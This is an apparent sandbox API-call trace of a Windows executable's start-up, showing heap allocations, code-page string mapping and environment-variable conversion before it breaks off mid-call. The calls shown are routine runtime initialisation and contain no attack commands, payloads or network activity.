0x27f8a8 [0085.732] GetStartupInfoW (in: lpStartupInfo=0x18e9ec | out: lpStartupInfo=0x18e9ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xb52ca3f3, hStdError=0x58)) [0085.732] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0085.733] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.733] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe\" " [0085.733] GetEnvironmentStringsW () returned 0x2800b0* [0085.733] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xaca) returned 0x280b88 [0085.740] FreeEnvironmentStringsW (penv=0x2800b0) returned 1 [0085.747] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CUsersabdoAppDataLocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75FCEB.tmp.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cusersabdoappdatalocalde14c4d4-af10-40ba-b2e7-b7cd78dfba75fceb.tmp.exe")) returned 0x6c [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xe2) returned 0x281660 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x98) returned 0x281750 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3e) returned 0x2757e8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x6c) returned 0x2817f0 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x6e) returned 0x281868 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x78) returned 0x272b20 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x62) returned 0x2818e0 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b130 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276ce8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x28) returned 0x27ab28 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1a) returned 0x27f298 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x4a) returned 0x281950 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x72) returned 0x272ba0 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b168 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b1a0 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1c) returned 0x27f2c0 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd2) returned 0x2819a8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x7c) returned 0x281a88 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x281b10 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3a) returned 0x275830 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x90) returned 0x281b50 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ab58 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b1d8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x281be8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x48) returned 0x276d38 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x281c28 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x275878 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x82) returned 0x281c88 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2e) returned 0x27b210 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1e) returned 0x27f2e8 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2c) returned 0x27b248 [0085.748] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x281d18 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x52) returned 0x281d78 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x2a) returned 0x27b280 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x2758c0 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x54) returned 0x281dd8 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27ab88 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x30) returned 0x27b2b8 [0085.749] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x8c) returned 0x281e38 [0085.749] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x280b88 | out: hHeap=0x260000) returned 1 [0085.811] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x2800b0 [0085.817] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x80) returned 0x281ed0 [0085.860] GetLastError () returned 0x0 [0085.860] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x2808b8 [0085.860] GetLastError () returned 0x0 [0085.860] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.860] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e9e0 | out: lpCPInfo=0x18e9e0) returned 1 [0085.866] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e4a8 | out: lpCPInfo=0x18e4a8) returned 1 [0085.874] GetLastError () returned 0x0 [0085.883] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.883] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꥊBĀ", cchSrc=256, lpDestStr=0x18dfe8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0085.883] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18e7bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿc ,µøé\x18", lpUsedDefaultChar=0x0) returned 256 [0085.883] GetLastError () returned 0x0 [0085.883] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0085.883] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e008, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0085.883] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e6bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿc ,µøé\x18", lpUsedDefaultChar=0x0) returned 256 [0085.891] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0085.891] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x40467c [0085.929] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281ed0) returned 0x80 [0085.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0085.942] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x1f) returned 0x27f310 [0085.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x27f310, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0085.948] GetLastError () returned 0x0 [0085.948] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x4) returned 0x281f58 [0085.948] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281f58) returned 0x4 [0085.949] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281f58, Size=0x8) returned 0x281f58 [0085.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0085.949] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x36) returned 0x281f68 [0085.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x281f68, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0085.949] GetLastError () returned 0x0 [0085.955] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281f58) returned 0x8 [0085.955] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281f58, Size=0xc) returned 0x281fa8 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0085.955] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x37) returned 0x280ae0 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x280ae0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0085.955] GetLastError () returned 0x0 [0085.955] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281fa8) returned 0xc [0085.955] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fa8, Size=0x10) returned 0x281fa8 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0085.955] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x3c) returned 0x275908 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x275908, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0085.955] GetLastError () returned 0x0 [0085.955] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281fa8) returned 0x10 [0085.955] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fa8, Size=0x14) returned 0x281fa8 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0085.955] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x31) returned 0x280b20 [0085.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x280b20, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0085.955] GetLastError () returned 0x0 [0085.956] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281fa8) returned 0x14 [0085.956] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fa8, Size=0x18) returned 0x281fa8 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0085.956] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x17) returned 0x281fc8 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x281fc8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0085.956] GetLastError () returned 0x0 [0085.956] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x281fa8) returned 0x18 [0085.956] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x281fa8, Size=0x1c) returned 0x280b60 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0085.956] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x24) returned 0x27abb8 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x27abb8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0085.956] GetLastError () returned 0x0 [0085.956] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x1c [0085.956] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x20) returned 0x280b60 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0085.956] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x14) returned 0x281fa8 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x281fa8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0085.956] GetLastError () returned 0x0 [0085.956] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x20 [0085.956] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x24) returned 0x280b60 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.956] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xd) returned 0x27e8e8 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x27e8e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0085.956] GetLastError () returned 0x0 [0085.956] RtlSizeHeap (HeapHandle=0x260000, Flags=0x0, MemoryPointer=0x280b60) returned 0x24 [0085.956] RtlReAllocateHeap (Heap=0x260000, Flags=0x0, Ptr=0x280b60, Size=0x28) returned 0x280b60 [0085.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 